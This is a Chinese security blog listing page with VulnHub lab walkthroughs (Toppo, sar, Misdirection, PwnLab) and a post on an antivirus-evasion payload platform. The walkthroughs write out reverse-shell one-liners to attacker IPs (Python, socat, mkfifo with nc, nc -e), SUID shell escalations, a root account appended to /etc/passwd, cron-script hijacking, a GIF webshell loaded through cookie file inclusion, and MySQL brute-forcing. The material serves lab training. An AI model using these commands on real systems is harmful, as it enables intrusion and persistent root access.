首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,853 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
43
篇与
的结果
2025-08-14
Vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式
vulnhub-Toppo靶机,SUID提权这个靶机主要是suid提权,相对简单,靶机下载:官网链接:https://download.vulnhub.com/toppo/Toppo.zip使用nmap和dirb进行web打点nmap -sS 10.10.10.222 -p- -A -T4dirsearch -u http://10.10.10.222/web识别,是一个普通的html页面whatweb http://10.10.10.222/发现了一个密码信息 12345ted123我们猜测账号就是那串密码夹着中间的英文ted登录成功之后就是内网渗透,我们使用FeatherScan进行内网信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan_v4_5_python -m http.server# 靶机wget 10.10.10.130:8000/FeatherScan_v4_5wget 10.10.10.130:8000/feather_vuln_db.txtchmod +x FeatherScan_v4_5./FeatherScan_v4_5发现提权漏洞得到两个提权向量,两个命令都可以用awk 'BEGIN {system("/bin/sh")}'python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换至此提权成功!很简单吧
2025年08月14日
1,305 阅读
0 评论
0 点赞
2025-07-06
sar靶机,suid计划任务提权
下载地址:https://www.vulnhub.com/entry/sar-1,425/首先是利用arp-scan进行主机发现其次是使用map对其进行端口扫描目录扫描一个cms,并且网站标题中已经泄露了版本信息我们检索cms漏洞将这个exp复制到本地反弹shellexport RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'# 或者socat TCP:10.10.10.1:8888 EXEC:/bin/bash创建交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'然后内网信息收集一堆操作,参考:https://mp.weixin.qq.com/s/B4Lc6gLNU0PuToGjrlngOA看到计划任务中包含了一个root文件每过5分钟执行一次cat /etc/crontabwww-data@sar:/var/www/html$ cat finally.shcat finally.sh#!/bin/sh./write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaywww-data@sar:/var/www/html$ ls -lls -ltotal 32-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txtdrwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.shwww-data@sar:/var/www/html$ echo 'export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.sh<fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.shbash: syntax error near unexpected token `('www-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaywww-data@sar:/var/www/html$ lslsfinally.sh index.html phpinfo.php robots.txt sar2HTML write.shwww-data@sar:/var/www/html$ echo 'socat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.sh<cat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaysocat TCP:10.10.10.1:8888 EXEC:/bin/bashwww-data@sar:/var/www/html$随后等待5分钟即可,本次靶机主要是利用计划任务提权
2025年07月06日
1,126 阅读
0 评论
0 点赞
2025-06-20
靶机Misdirection: 1 ~ VulnHub
Misdirection: 1 ~ vulnhub下载链接见:https://download.vulnhub.com/misdirection/Misdirection.zip这里我们需要看首先我们使用arp-scan对内网主机进行发现随后对靶机进行端口扫描,有一个22端口ssh协议,80端口开启了http协议,还有3306的mysql数据库端口,8080也是http协议访问80端口,并从wappalyzer信息收集插件看到这个cms是Drupal随后点击进入到这个界面,告诉我们说这个系统是开源的,并且有源代码,还有一个下载选项登录框尝试万能密码,却限制了我们只能使用邮箱登录,随后我们尝试注册一个用户却提示了一个信息,无法发送电子邮件随后这里有一个Source Code源码,查看这个作者的源码中包含了一个admin,(其他代码信息没啥利用价值)尝试访问却提示管理因不安全通道而关闭突然发现我们目录扫描还没扫呢,通过扫描结果也能看到目标站点设置了防目录扫描功能切换思路,我们来到8080端口,意外的发现这是一个wordpress的内容管理系统按照常规的方式,首先是后台的爆破http://10.10.10.129:8080/wordpress/wp-admin但是呢它重定向到了另一个页面,而且这个页面并不是在当前的这个界面当我利用dirb进行目录扫描的时候呢,不扫wordpress这个命令,有一个debug发现了新的突破口当我想要创建一个交互式的终端的时候呢,发现使用su命令并不能正常的使用python3 -c 'import pty;pty.spawn("/bin/bash")'只能被迫使用nc进行反弹shell,反弹成功后就能利用su命令切换用户啦rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f接下来就是信息收集,一条龙下来就可,也可以使用自定义脚本学习文章参考:近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等全部获取完成后,你会发现几个关键的点,sudo 可以利用,有一个/bin/bash,但是需要brexit用户才能用奥还有个思路就是前端有wordpress,那么必定和数据库有交互,我们来看配置文件,能看到密码找到了第一个和密码相关的,那么这个密码是不是root用户的密码呢?很明显,不会让你这么轻易获得root权限的登录数据库mysql -ublog -pabcdefghijklmnopqrstuv找用户表破解失败了,不过不要紧我们继续回到那个sudo,他说了要求brexit用户才能执行那个/bin/bash,那么久指定一个用户吧sudo -u brexit /bin/bash相当的棒,提权成功,经过一番折磨后,该收集的信息都收集了,直到我翻到.viminfo,看到了用户编辑过/etc/passwd,这个文件主要记录了一些vim的编辑历史查看权限,这下不就有思路啦(那么多信息收集命令,既然少了这么重要的东西。。。。。。赶紧补上)然后我们仿照/etc/passwd的格式生成一个账号 bAIbAIxiaoyu 和密码123456,将这个用户分到root组下echo 'bAIbAIxiaoyu:$1$oFd2MoKR$eVjr6Fe7JWwjAPEfaTQSy.:0:0:root:/root:/bin/bash' >> /etc/passwd至此渗透结束往期推荐红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎!媲美DeepSeek,附源码【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入(sql十大注入类型):技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细
2025年06月20日
1,525 阅读
0 评论
0 点赞
2025-05-18
一款在线的免杀平台AVEvasionCraftOnline
一款在线的免杀平台sudo apt updatesudo apt install mingw-w64wget https://github.com/yutianqaq/AVEvasionCraftOnline/releases/download/v1.2/AVEvasionCraftOnline-v1.2.zip unzip AVEvasionCraftOnline-v1.2.zipvi application.yaml # 修改路径运行java -jar -Dspring.config.location=application.yaml AVEvasionCraftOnline.jar --server.port=80访问接下来,我们用火绒测试。在线查杀往期推荐24年6月版本AWVS激活,AWVS漏洞扫描工具安装以及基本使用教程2024 最新 Kali Linux 定制化魔改,完整版,添加常见60渗透工具放开双手 !SQL注入Fuzzing字典 (270个)【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏upload-labs通关全教程(建议萌新收藏)Web安全-文件上传漏洞超详细解析
2025年05月18日
1,453 阅读
0 评论
0 点赞
2025-05-18
PwnLab init-文件包含、反弹shell、提权--靶机渗透思路讲解
如果需要Vulnhub靶机链接,可以后台私信【PwnLab】,关于网安学习群,可以后台添加作者备注【进群】即可首页有一个登录框他没有验证码,我们试试暴力破解开始爆破了,全部失败,哈哈哈nmap全端口扫描试试有mysql服务,再爆破一下数据库,使用MSF框架use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.71.1 //设置目标服务器的ip地址 set rport 3306 //设置目标端口,为MySQL开启的端口号,默认是3306 set username root //设置用户名,默认即为root set pass_file /home/kali/pass.txt //指定密码字典文件的路径 run //开始爆破 爆破失败。。。。。。在url上面有一个page,猜测是文件包含漏洞,我们包含/etc/passwd,没有效果php filter伪协议试试也不行这些都试过了,那么直接包含index呢,出来了index的源码,就可以发现它的包含规则不能包含后缀解码看看,对这个lang的cookie进行文件包含<?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. 御剑目录扫描一下包含upload,并base64解码,获取源码<?php session_start(); if (!isset($_SESSION['user'])) { die('你没有登录.'); } ?> <html> <body> <form action='' method='post' enctype='multipart/form-data'> <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload'/> </form> </body> </html> <?php if(isset($_POST['submit'])) { if ($_FILES['file']['error'] <= 0) { $filename = $_FILES['file']['name']; $filetype = $_FILES['file']['type']; $uploaddir = 'upload/'; $file_ext = strrchr($filename, '.'); $imageinfo = getimagesize($_FILES['file']['tmp_name']); $whitelist = array(".jpg",".jpeg",".gif",".avif"); if (!(in_array($file_ext, $whitelist))) { die('Not allowed extension, please upload images only.'); } if(strpos($filetype,'image') === false) { die('Error 001'); } if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002'); } if(substr_count($filetype, '/')>1){ die('Error 003'); } $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext; if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) { echo "<img src=\"".$uploadfile."\"><br />"; } else { die('Error 4'); } } } ?> login源码,我们看到了有一个config.php引用,而且还是在当前目录<?php session_start(); require("config.php"); $mysqli = new mysqli($server, $username, $password, $database); if (isset($_POST['user']) and isset($_POST['pass'])) { $luser = $_POST['user']; $lpass = base64_encode($_POST['pass']); $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?"); $stmt->bind_param('ss', $luser, $lpass); $stmt->execute(); $stmt->store_Result(); if ($stmt->num_rows == 1) { $_SESSION['user'] = $luser; header('Location: ?page=upload'); } else { echo "Login failed."; } } else { ?> <form action="" method="POST"> <label>用户名: </label><input id="user" type="test" name="user"><br /> <label>密 码: </label><input id="pass" type="password" name="pass"><br /> <input type="submit" name="submit" value="Login"> </form> <?php } config包含解码,好有了mysql密码mysql连接指定好数据库找到指定表名就能看到用户密码了,密码有==号的话,那么大概率就是base64编码解码登录试试登录成功了,只允许图片上传我们分析之前找到的文件上传源码,是白名单<?php session_start(); if (!isset($_SESSION['user'])) { die('你没有登录.'); } ?> <html> <body> <form action='' method='post' enctype='multipart/form-data'> <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload'/> </form> </body> </html> <?php if(isset($_POST['submit'])) { if ($_FILES['file']['error'] <= 0) { $filename = $_FILES['file']['name']; $filetype = $_FILES['file']['type']; $uploaddir = 'upload/'; $file_ext = strrchr($filename, '.'); $imageinfo = getimagesize($_FILES['file']['tmp_name']); $whitelist = array(".jpg",".jpeg",".gif",".avif"); if (!(in_array($file_ext, $whitelist))) { die('Not allowed extension, please upload images only.'); } if(strpos($filetype,'image') === false) { die('Error 001'); } if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002'); } if(substr_count($filetype, '/')>1){ die('Error 003'); } $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext; if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) { echo "<img src=\"".$uploadfile."\"><br />"; } else { die('Error 4'); } } } ?> 图片马gif正常上传我们用dirb扫到一个目录gif上传成功伪协议包含不成功分析index.php源代码,它对cookie的值作为路径,这个参数为lang<?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. 那我们就添加一个cookielang=../upload/66c30a7180c399c3188ff89f1e2c5c02.gif此时回到首页蚁剑连接试试这里不要忘了添加cookie反弹测试nc,有e参数,可以用nc反弹shellnc 10.0.0.190 80 -e /bin/bash 反弹成功终端升级echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py 切换root账号,弱口令成功了。。。。如果不用弱口令,正常情况是这样的,找到数据库中的密码和用户猜测这个用户能用登录该系统,但是登录成功后,没什么利用价值切换用户kane,里面有一个msgmike文件,查看它,这有一个命令查看这个文件没有权限我们切换这个mike用户,不能登录,鉴权失败,我们也就无法查看这个文件然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,则会先从当前目录来寻找cat指令,相当于我们自己创建一个读文件的cat指令,用这个指令来读新建取/home/mike/msg.txt文件,我们新建一个cat文件,并添加执行权限,依次执行以下命令这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),我们就会提升到mike权限:我们切换这个用户的跟目录发现有个msg2root查看发现一个bin/bash会话,不断尝试,直到如下结果; /bin/bash -p才能够以root的权限查看flag.txt往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,007 阅读
0 评论
0 点赞
1
2
3
4
...
9